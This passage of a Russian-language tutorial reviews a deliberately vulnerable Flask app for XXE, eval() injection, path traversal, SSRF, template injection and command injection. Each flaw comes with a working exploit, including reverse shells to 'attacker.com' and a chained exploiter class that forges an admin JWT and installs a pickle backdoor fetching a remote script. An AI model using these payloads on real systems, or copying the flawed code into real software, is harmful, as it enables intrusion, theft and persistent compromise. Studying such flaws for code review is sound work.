root = processor.parse_document(xml_content)
# Обработка XML
for doc in root.findall('document'):
title = doc.find('title').text
content = doc.find('content').text
# Сохранение в БД...
return jsonify({"status": "success"})
Почему возникает уязвимость?
XML External Entity (XXE) Injection:- Уязвимость возникает из-за использования небезопасного XML-парсера ElementTree, который по умолчанию поддерживает обработку внешних сущностей (entities).
- Внешние сущности могут использоваться для чтения файлов на сервере или отправки запросов к внутренним ресурсам.
Python: Скопировать в буфер обмена
Код:
parser = ElementTree.XMLParser()
tree = ElementTree.parse(io.StringIO(xml_content), parser)
Например:
Python: Скопировать в буфер обмена
Код:
# Чтение локальных файлов
xxe_payload = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<document>
<title>&xxe;</title>
<content>test</content>
</document>
</root>
"""
# SSRF через XXE
ssrf_payload = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://internal-service:8080/api/keys" >]>
<root>
<document>
<title>&xxe;</title>
<content>test</content>
</document>
</root>
"""
r = requests.post(
'http://target.com/import/xml',
data=xxe_payload,
headers={'Content-Type': 'application/xml'}
)
Разбор эксплуатации:
- Определение внешней сущности (ENTITY):
Сущность xxe ссылается на локальный файл /etc/passwd. - Использование сущности в XML:
При парсинге, значение сущности &xxe; подставляется в тэг <title>, позволяя атакующему извлечь содержимое файла.
- Определение сущности для запроса к внутреннему сервису:
Сущность xxe отправляет HTTP-запрос на внутренний сервис. - Использование сущности:
Атакующий получает данные из внутреннего сервиса, доступ к которому обычно ограничен.
Python: Скопировать в буфер обмена
Код:
# routes/api.py
@bp.route('/api/documents/search', methods=['POST'])
def search_documents():
query = request.get_json()
# Что может пойти тут не так?
filter_expr = query.get('filter', 'True')
documents = Document.query.filter(eval(filter_expr)).all()
return jsonify([doc.to_dict() for doc in documents])
Почему возникает уязвимость?
Опасность eval():- Функция eval() исполняет строку как код Python, что делает её чрезвычайно опасной, если входные данные не контролируются.
- Это позволяет злоумышленнику внедрять вредоносный код через параметры запроса, что может привести к выполнению произвольных команд на сервере.
Python: Скопировать в буфер обмена
Код:
import requests
# RCE через eval
payload = {
"filter": "__import__('os').system('nc -e /bin/bash attacker.com 4444') or True"
}
# Извлечение данных
data_payload = {
"filter": "Document.id == 1 and open('/etc/passwd').read()"
}
r = requests.post('http://target.com/api/documents/search', json=payload)
Разбор эксплуатации:
- Подмена фильтра:
Атакующий передаёт в параметре filter строку, которая вызывает os.system() для запуска команды nc, устанавливающей обратное соединение с атакующим сервером. - Выполнение кода:
При обработке запроса eval() исполняет код, что приводит к созданию удалённого доступа к серверу.
- Чтение конфиденциальных файлов:
Он также может передать фильтр, который не только возвращает документы, но и читает файл /etc/passwd. - Выполнение кода через eval():
Запрос к серверу позволяет извлечь содержимое файла, что может привести к утечке.
Мы близки к концу, как наш бекендер вообще так кодит?
Python: Скопировать в буфер обмена
Код:
# services/template_loader.py
class TemplateLoader:
def __init__(self, template_dir):
self.template_dir = template_dir
def load_template(self, name):
# Уязвимая загрузка шаблона
path = os.path.join(self.template_dir, name)
with open(path) as f:
return f.read()
def import_template(self, url):
# SSRF уязвимость
response = requests.get(url)
return response.text
# routes/admin.py
@bp.route('/admin/templates/import', methods=['POST'])
@admin_required
def import_template():
data = request.get_json()
loader = TemplateLoader(app.config['TEMPLATE_DIR'])
if 'url' in data:
content = loader.import_template(data['url'])
else:
content = loader.load_template(data['name'])
# Сохранение шаблона
with open(os.path.join(app.config['TEMPLATE_DIR'], data['name']), 'w') as f:
f.write(content)
return jsonify({"status": "success"})
Почему возникает уязвимость?
Небезопасная загрузка шаблонов:- В классе TemplateLoader метод load_template позволяет загружать шаблоны по имени, однако отсутствует валидация пути. Это создает уязвимость Path Traversal.
- Метод import_template использует URL для загрузки шаблонов, что позволяет злоумышленникам выполнять SSRF-атаки, посылая запросы на внутренние сервисы.
Python: Скопировать в буфер обмена
Код:
def load_template(self, name):
path = os.path.join(self.template_dir, name)
with open(path) as f:
return f.read()
Например:
Python: Скопировать в буфер обмена
Код:
# Path Traversal
r = requests.post('http://target.com/admin/templates/import', json={
"name": "../../config.py"
})
# SSRF к внутренним сервисам
r = requests.post('http://target.com/admin/templates/import', json={
"url": "http://localhost:6379/FLUSHALL" # Атака на Redis
})
# SSRF + RCE через загрузку шаблона с Gist
template_payload = """
{% raw %}
{% for x in ().__class__.__base__.__subclasses__() %}
{% if "warning" in x.__name__ %}
{{x()._module.__builtins__['__import__']('os').popen("nc -e /bin/bash attacker.com 4444").read()}}
{% endif %}
{% endfor %}
{% endraw %}
"""
# Загружаем вредоносный шаблон через GitHub Gist
r = requests.post('http://target.com/admin/templates/import', json={
"url": "https://gist.raw.githubusercontent.com/attacker/payload.html"
})
Разбор эксплуатации:
- Подмена имени файла:
Атакующий передает в запросе имя файла с использованием символов .., что позволяет ему получить доступ к родительскому каталогу и загрузить конфиденциальные файлы, такие как config.py. - Использование внутреннего URL:
Он же может отправить запрос на внутренний сервис, например, Redis, с помощью метода import_template. - Атака на сервис:
Это может вызвать выполнение команд, которые, например, очищают данные в Redis с помощью команды FLUSHALL. - Использование Jinja2:
Атакующий может загрузить вредоносный шаблон, который содержит код, использующий механизм Jinja2 для выполнения произвольных команд на сервере. - Удаленное выполнение кода:
Код внутри шаблона вызывает os.popen, устанавливая обратное соединение с атакующим сервером, позволяя ему получить полный доступ к системе.
Python: Скопировать в буфер обмена
Код:
# services/logger.py
class Logger:
def __init__(self, log_file):
self.log_file = log_file
def log(self, message, level='INFO'):
os.system(f'echo "[{level}] {message}" >> {self.log_file}')
# middleware/logging.py
@app.after_request
def log_request(response):
logger = Logger('/var/log/app.log')
logger.log(f"{request.remote_addr} - {request.method} {request.path}")
return response
Почему возникает уязвимость?
Небезопасное логирование:- В классе Logger метод log использует os.system для записи сообщений в файл логов. Это создает уязвимость командной инъекции, так как входные данные (сообщения и уровень логирования) не фильтруются или не экранируются.
Python: Скопировать в буфер обмена
Код:
def log(self, message, level='INFO'):
os.system(f'echo "[{level}] {message}" >> {self.log_file}')
Например:
Python: Скопировать в буфер обмена
Код:
import requests
# Command Injection через X-Forwarded-For
headers = {
'X-Forwarded-For': '8.8.8.8; nc -e /bin/bash attacker.com 4444'
}
r = requests.get('http://target.com/api/health', headers=headers)
Разбор эксплуатации:
- Подмена IP-адреса:
Злоумышленник отправляет HTTP-запрос, добавляя заголовок X-Forwarded-For, в который включается не только поддельный IP-адрес, но и команда nc для обратного соединения с атакующим сервером. - Выполнение команды:
При вызове logger.log сообщение логирования включает поддельный IP-адрес и команду nc, что приводит к выполнению произвольного кода на сервере через os.system. Это может дать злоумышленнику доступ к командной оболочке.
Python: Скопировать в буфер обмена
Код:
class AdvancedExploiter:
def __init__(self, target_url):
self.target = target_url
self.session = requests.Session()
def get_admin_access(self):
# 1. Используем XXE для получения секретного ключа
xxe_payload = """<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///app/config.py">
]>
<root>&xxe;</root>
"""
r = self.session.post(f"{self.target}/import/xml", data=xxe_payload)
config_data = r.json()
# 2. Подделываем JWT с полученным секретом
secret = self.extract_secret(config_data)
admin_token = self.forge_jwt(secret)
self.session.headers['Authorization'] = f'Bearer {admin_token}'
# 3. Загружаем шелл через template import
shell = "{% raw %}{{request.application.__globals__.__builtins__.__import__('os').popen(request.args.cmd).read()}}{% endraw %}"
self.session.post(f"{self.target}/admin/templates/import", json={
"name": "shell.html",
"content": shell
})
# 4. Устанавливаем бэкдор через pickle
backdoor = self.create_pickle_backdoor()
self.session.post(f"{self.target}/api/cache/set", json={
"key": "_backdoor",
"value": backdoor
})
return True
def create_pickle_backdoor(self):
class Backdoor:
def __reduce__(self):
return (os.system, (
'curl http://attacker.com/backdoor.sh | bash',
))
return base64.b64encode(pickle.dumps(Backdoor())).decode()
def forge_jwt(self, secret):
payload = {
"user_id": 1,
"role": "admin",
"exp": int(time.time()) + 86400
}
return jwt.encode(payload, secret, algorithm='HS256')
def extract_secret(self, config_data):
# Извлекаем SECRET_KEY из конфига
pattern = r"SECRET_KEY\s*=\s*['\"](.*?)['\"]"
match = re.search(pattern, config_data)
return match.group(1) if match else None
# Использование
exploiter = AdvancedExploiter('http://target.com')
if exploiter.get_admin_access():
print("Успешно получен доступ админа и установлен бэкдор")
Заключение
Итак, статья получилась довольно интересной. Надеюсь, что мне удалось донести до вас несколько важных моментов. Во-первых, уязвимости могут возникать на любом уровне, и мы рассмотрели различные виды уязвимостей, а также научились создавать свои первые мини-эксплоиты. Во-вторых, очень важно уметь находить их сразу в коде. Надеюсь, вам понравилось! Всем пока!